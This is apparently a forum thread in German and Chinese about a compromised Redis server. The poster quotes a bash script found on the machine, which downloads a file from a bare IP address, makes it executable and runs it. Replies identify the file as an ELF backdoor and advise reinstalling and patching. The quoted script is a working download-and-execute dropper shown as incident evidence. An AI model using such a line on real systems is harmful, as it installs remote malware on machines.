Heute habe ich festgestellt, dass Redis keine Verbindung zu einem Server herstellen konnte. Ich habe eine solche Anweisung auf dem Server gefunden
#!/bin/bash
zfile="/tmp/z.TF"
if [ ! -f "$zfile" ]; then
wget -P /tmp/ http://27.102.101.67/z.TF && chmod 777 /tmp/z.TF && /tmp/z.TF
fi
Z.TF-Datei heruntergeladen und ausgeführt. Beim Öffnen von z.TF handelt es sich um einen Bytecode. Dieses Programm kann automatisch erneut ausgeführt werden. Derzeit ist dieser Programmprozess beendet, aber der Redis-Dienst ist immer noch nicht verfügbar. Ich weiß nicht, ob noch andere Schadprogramme übrig sind.
Kann jemand bitte den Inhalt von z.TF erklären? Und wie man damit umgeht.
z.TF 是个ELF格式的linux可执行文件
你服务器被装了后门,尽快重装系统,修复漏洞。
该升级的都升级一遍。
基本可以确定是 后门+肉鸡
话说你把t.ZF的代码发上来啊
你贴出来的代码,你不是自己已经解释清楚了么